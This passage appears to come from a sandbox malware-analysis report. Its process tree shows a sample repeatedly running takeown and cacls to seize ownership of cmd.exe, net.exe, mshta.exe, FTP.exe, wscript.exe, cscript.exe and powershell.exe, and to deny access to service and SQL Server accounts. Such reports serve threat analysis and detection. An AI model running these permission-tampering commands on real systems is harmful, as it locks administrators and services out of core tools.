    3⤵
    PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4184
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
    3⤵
    PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4484
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d SERVICE
    3⤵
    PID:5020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3408
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
    3⤵
    PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2724
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d "network service"
    3⤵
    PID:4144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1940
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g system:r
    3⤵
    PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:664
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
    3⤵
    PID:4648
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\cmd.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2920
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
    3⤵
    PID:1180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:556
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
    3⤵
    PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4900
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
    3⤵
    PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3708
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
    3⤵
    PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4356
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
    3⤵
    PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2188
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1672
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
    3⤵
    PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3172
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
    3⤵
    PID:3660
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\net.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2724
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /g Administrators:f
    3⤵
    PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2056
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /g Users:r
    3⤵
    PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4732
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /g Administrators:r
    3⤵
    PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3520
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d SERVICE
    3⤵
    PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4372
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d mssqlserver
    3⤵
    PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1632
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d "network service"
    3⤵
    PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4480
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d system
    3⤵
    PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2148
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
    3⤵
    PID:1720
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\net.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:312
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
    3⤵
    PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:732
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
    3⤵
    PID:4184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5096
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
    3⤵
    PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4808
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
    3⤵
    PID:3464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3236
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
    3⤵
    PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4136
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
    3⤵
    PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2724
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d system
    3⤵
    PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1580
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
    3⤵
    PID:4508
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\net1.exe /a
    3⤵
    - Modifies file permissions
    PID:4552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1960
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /g Administrators:f
    3⤵
    PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2784
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /g Users:r
    3⤵
    PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3168
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /g Administrators:r
    3⤵
    PID:4372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3336
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d SERVICE
    3⤵
    PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4624
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d mssqlserver
    3⤵
    PID:3088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3944
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d "network service"
    3⤵
    PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1136
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d system
    3⤵
    PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4408
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
    3⤵
    PID:4876
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\net1.exe /a
    3⤵
    - Modifies file permissions
    PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4628
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
    3⤵
    PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4484
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
    3⤵
    PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2432
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
    3⤵
    PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1428
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
    3⤵
    PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2188
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
    3⤵
    PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3120
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
    3⤵
    PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1944
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d system
    3⤵
    PID:740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:232
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
    3⤵
    PID:4052
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\mshta.exe /a
    3⤵
    - Modifies file permissions
    PID:3144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1952
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /g Administrators:f
    3⤵
    PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3480
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /g Users:r
    3⤵
    PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4452
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
    3⤵
    PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3356
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d SERVICE
    3⤵
    PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3236
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
    3⤵
    PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2816
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d "network service"
    3⤵
    PID:4520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4440
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d system
    3⤵
    PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1788
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
    3⤵
    PID:2724
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\mshta.exe /a
    3⤵
    - Modifies file permissions
    PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:524
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
    3⤵
    PID:1692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4360
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
    3⤵
    PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1772
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
    3⤵
    PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1828
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
    3⤵
    PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4184
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
    3⤵
    PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4800
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:632
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d system
    3⤵
    PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3724
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
    3⤵
    PID:3940
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\FTP.exe /a
    3⤵
    - Modifies file permissions
    PID:4696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3092
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /g Administrators:f
    3⤵
    PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3436
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /g Users:r
    3⤵
    PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:800
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
    3⤵
    PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3680
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d SERVICE
    3⤵
    PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4808
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
    3⤵
    PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2340
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d "network service"
    3⤵
    PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4720
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d system
    3⤵
    PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:776
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
    3⤵
    PID:940
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\FTP.exe /a
    3⤵
    - Modifies file permissions
    PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3064
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
    3⤵
    PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2392
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
    3⤵
    PID:2260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4484
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
    3⤵
    PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4876
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
    3⤵
    PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2912
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
    3⤵
    PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1120
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
    3⤵
    PID:3432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4368
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d system
    3⤵
    PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3732
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
    3⤵
    PID:3500
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\wscript.exe /a
    3⤵
    - Modifies file permissions
    PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:544
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /g Administrators:f
    3⤵
    PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3984
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /g Users:r
    3⤵
    PID:1808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4028
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
    3⤵
    PID:1692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1772
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d SERVICE
    3⤵
    PID:2348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4184
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
    3⤵
    PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5068
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d "network service"
    3⤵
    PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5080
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d system
    3⤵
    PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3080
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:3940
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\wscript.exe /a
    3⤵
    - Modifies file permissions
    PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4312
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
    3⤵
    PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5028
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
    3⤵
    PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4728
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
    3⤵
    PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5076
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1464
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
    3⤵
    PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3144
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
    3⤵
    PID:4008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2324
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d system
    3⤵
    PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2588
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:1716
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\cscript.exe /a
    3⤵
    - Modifies file permissions
    PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3528
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /g Administrators:f
    3⤵
    PID:3700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4720
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /g Users:r
    3⤵
    PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4952
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
    3⤵
    PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4788
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d SERVICE
    3⤵
    PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1336
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
    3⤵
    PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3628
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d "network service"
    3⤵
    PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1688
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d system
    3⤵
    PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4548
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:4440
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\cscript.exe /a
    3⤵
    - Modifies file permissions
    PID:2108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4312
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
    3⤵
    PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4052
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
    3⤵
    PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2912
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
    3⤵
    PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1808
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
    3⤵
    PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1976
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
    3⤵
    PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4520
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
    3⤵
    PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1168
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d system
    3⤵
    PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3428
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:4268
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
    3⤵
    - Modifies file permissions
    PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3088
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    3⤵
    PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2920
